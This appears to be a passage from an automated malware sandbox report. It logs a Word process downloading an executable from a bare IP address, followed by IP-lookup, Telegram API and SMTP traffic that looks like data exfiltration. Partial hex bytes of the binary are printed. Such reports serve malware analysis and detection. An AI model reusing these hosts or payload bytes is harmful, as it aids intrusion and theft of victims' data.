                                                                                                                                                                        Jan 6, 2025 07:54:02.943981886 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.944014072 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.944025993 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.948829889 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.948842049 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.948858976 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.948867083 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:03.382610083 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:03.431324959 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:04.898358107 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:04.903281927 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:05.169238091 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:05.169872046 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:05.170996904 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:05.175874949 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:05.176011086 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.459235907 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.459461927 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.464342117 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.566101074 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:54:06.743177891 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.743597031 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.748449087 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.782367945 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.787259102 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.787345886 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.031544924 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.032186031 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.036957979 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.324462891 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.324481964 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.324549913 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.455106020 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.457653046 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.462548018 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.671569109 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.672250032 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.677911997 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.723654985 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.724638939 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.730192900 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.956434965 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.956732035 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.961563110 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.010129929 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.010358095 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.015661955 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.224337101 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.224849939 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.229696035 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.275126934 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.275496006 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.280456066 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.519903898 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.519923925 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.520018101 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.521886110 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.526724100 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.544018030 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.544258118 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.549032927 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.788535118 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.792751074 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.797597885 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.810349941 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.810635090 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:08.815568924 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.075663090 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.075712919 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.076039076 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.076081038 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.081892967 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.081904888 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.343074083 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.343090057 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.343452930 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.343555927 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.343642950 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.343822002 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.343838930 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.343852997 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.348351002 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348361969 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348428011 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348490000 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348690987 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348704100 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348711967 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348753929 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348912001 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348920107 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.348927975 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.614792109 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.616797924 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.621598005 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.630707026 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.681468964 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.881601095 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:09.882040024 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:09.886934042 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.147521973 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.147746086 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:10.153393984 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.412262917 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.412987947 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:10.413069010 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:10.413084984 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:10.413104057 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:10.417902946 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.417917967 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.418044090 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.418052912 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.856466055 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:10.900049925 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:12.396733999 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:12.401658058 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:12.661329031 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:12.661892891 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:12.662683964 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:12.667507887 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:12.667614937 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:13.893156052 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:13.893332005 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:13.898201942 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:14.178177118 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:14.178481102 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:14.183367968 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:14.969419956 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:14.969886065 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:14.974729061 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:15.266648054 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:15.266669989 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:15.266745090 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:15.274298906 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:15.279139042 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:15.539504051 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:15.540796041 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:15.545594931 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:15.822565079 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:15.822859049 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:15.827744007 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.088462114 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.088838100 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:16.093719959 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.357901096 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.358227968 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:16.363107920 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.623557091 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.623837948 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:16.628659010 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.890573025 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:16.890849113 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:16.895745039 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.156724930 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.157164097 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:17.157275915 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:17.157402039 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:17.157418966 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:17.157470942 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:17.162007093 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162122965 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162132978 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162234068 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162241936 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162288904 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162297964 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162442923 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162452936 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.162461996 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.441930056 CET5874989246.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:17.493843079 CET49892587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:19.087399960 CET4973980192.168.2.4147.124.216.113

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jan 6, 2025 07:53:16.832300901 CET5370753192.168.2.41.1.1.1
                                                                                                                                                                        Jan 6, 2025 07:53:16.845573902 CET53537071.1.1.1192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:25.316695929 CET5206453192.168.2.41.1.1.1
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET53520641.1.1.1192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.450095892 CET5231253192.168.2.41.1.1.1
                                                                                                                                                                        Jan 6, 2025 07:53:26.457385063 CET53523121.1.1.1192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:39.646120071 CET5343953192.168.2.41.1.1.1
                                                                                                                                                                        Jan 6, 2025 07:53:39.652966976 CET53534391.1.1.1192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:47.643543959 CET5451153192.168.2.41.1.1.1
                                                                                                                                                                        Jan 6, 2025 07:53:48.078732014 CET53545111.1.1.1192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:57.518140078 CET5706053192.168.2.41.1.1.1
                                                                                                                                                                        Jan 6, 2025 07:53:57.525367975 CET53570601.1.1.1192.168.2.4

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Jan 6, 2025 07:53:16.832300901 CET192.168.2.41.1.1.10x6c06Standard query (0)amazonenviro.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.316695929 CET192.168.2.41.1.1.10xcdf9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:26.450095892 CET192.168.2.41.1.1.10x2b7bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:39.646120071 CET192.168.2.41.1.1.10xffe3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:47.643543959 CET192.168.2.41.1.1.10x2668Standard query (0)mail.irco.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:57.518140078 CET192.168.2.41.1.1.10xb464Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Jan 6, 2025 07:53:16.845573902 CET1.1.1.1192.168.2.40x6c06No error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:26.457385063 CET1.1.1.1192.168.2.40x2b7bNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:26.457385063 CET1.1.1.1192.168.2.40x2b7bNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:39.652966976 CET1.1.1.1192.168.2.40xffe3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:48.078732014 CET1.1.1.1192.168.2.40x2668No error (0)mail.irco.com.sa46.151.208.21A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:57.525367975 CET1.1.1.1192.168.2.40xb464No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:57.525367975 CET1.1.1.1192.168.2.40xb464No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • amazonenviro.com
                                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                                        • api.telegram.org
                                                                                                                                                                        • 147.124.216.113
                                                                                                                                                                        • checkip.dyndns.org

                                                                                                                                                                        HTTP Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.449739147.124.216.113807412C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:14.671390057 CET181OUTGET /albt.exe HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Language: en-ch
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                        Host: 147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.192961931 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Last-Modified: Sun, 05 Jan 2025 23:00:50 GMT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        ETag: "ef51f5a9c55fdb1:0"
                                                                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:13 GMT
                                                                                                                                                                        Content-Length: 1161216
                                                                                                                                                                        Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                                                                                                                        Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@@Pn& |TW.text `.itextH `.data@ @.bss6.idatan&P(@.tls4.rdata@@.reloc|~@B.rsrc @@@@@
                                                                                                                                                                        Jan 6, 2025 07:53:15.192986965 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01
                                                                                                                                                                        Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@WideString@@
                                                                                                                                                                        Jan 6, 2025 07:53:15.193001986 CET448INData Raw: 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df
                                                                                                                                                                        Data Ascii: (z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD@,<xH9JtG!(G
                                                                                                                                                                        Jan 6, 2025 07:53:15.193022013 CET1236INData Raw: ff ff 23 50 fc 8b 0d 20 17 47 00 29 c8 01 ca eb b9 c3 90 53 8b d8 e8 8c ff ff ff 6a 04 68 00 10 00 00 68 00 00 14 00 6a 00 e8 cd fc ff ff 85 c0 74 4d 8b 15 0c 17 47 00 8b c8 c7 01 08 17 47 00 a3 0c 17 47 00 89 51 04 89 02 8b d0 81 c2 00 00 14 00
                                                                                                                                                                        Data Ascii: #P G)SjhhjtMGGGQ+ G+G[3 G3[=MGt4 jn7G3tjU7G3uSVWUNjhVj
                                                                                                                                                                        Jan 6, 2025 07:53:15.193037033 CET1236INData Raw: 50 fc f6 c2 07 89 c1 53 8a 1d 4d 10 47 00 0f 85 cb 00 00 00 84 db 8b 1a 75 61 83 6a 0c 01 8b 42 08 74 2c 85 c0 89 4a 08 8d 40 01 89 41 fc 74 07 31 c0 88 03 5b c3 90 8b 4b 04 89 5a 14 89 4a 04 89 51 14 89 53 04 c6 03 00 31 c0 5b c3 90 90 85 c0 74
                                                                                                                                                                        Data Ascii: PSMGuajBt,J@At1[KZJQS1[tBJHA19SuCRMGp#tQRjZY#zQRjZY%Gt6jr%Gt j\Vu
                                                                                                                                                                        Jan 6, 2025 07:53:15.193051100 CET448INData Raw: 83 e9 18 39 ca 76 44 89 c8 c1 e9 02 01 c1 31 c0 29 d1 83 d0 ff 21 c8 01 d0 89 c3 52 e8 a2 f7 ff ff 5a 85 c0 74 22 81 fb 2c 0a 04 00 76 03 89 50 f8 8b 4e f8 89 c3 89 c2 89 f0 e8 d4 f4 ff ff 89 f0 e8 e5 fa ff ff 89 d8 5e 5b c3 d1 e9 39 ca 72 06 89
                                                                                                                                                                        Data Ascii: 9vD1)!RZt",vPN^[9rP^[ct,vX^[1^[@SX$,sx[u3@= Gt
                                                                                                                                                                        Jan 6, 2025 07:53:15.232055902 CET1236INData Raw: 92 8d 14 92 83 f9 01 83 df ff c1 e8 1a 81 e2 ff ff ff 03 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07
                                                                                                                                                                        Data Ascii: 0000?000G_@SV^[USVE@;rM
                                                                                                                                                                        Jan 6, 2025 07:53:15.232072115 CET1236INData Raw: d8 07 fe ff ff 85 f8 47 fe ff 8b c3 e8 1e fa ff ff 8b d8 85 db 75 8e 8b 7f 04 81 ff 08 17 47 00 0f 85 72 ff ff ff 8b 1d b0 37 47 00 eb 37 8b c3 83 c0 10 e8 5f fd ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8
                                                                                                                                                                        Data Ascii: GuGr7G7_u&GsGG[7GtG|GXG3G)@(AG7G>FOGGGGG
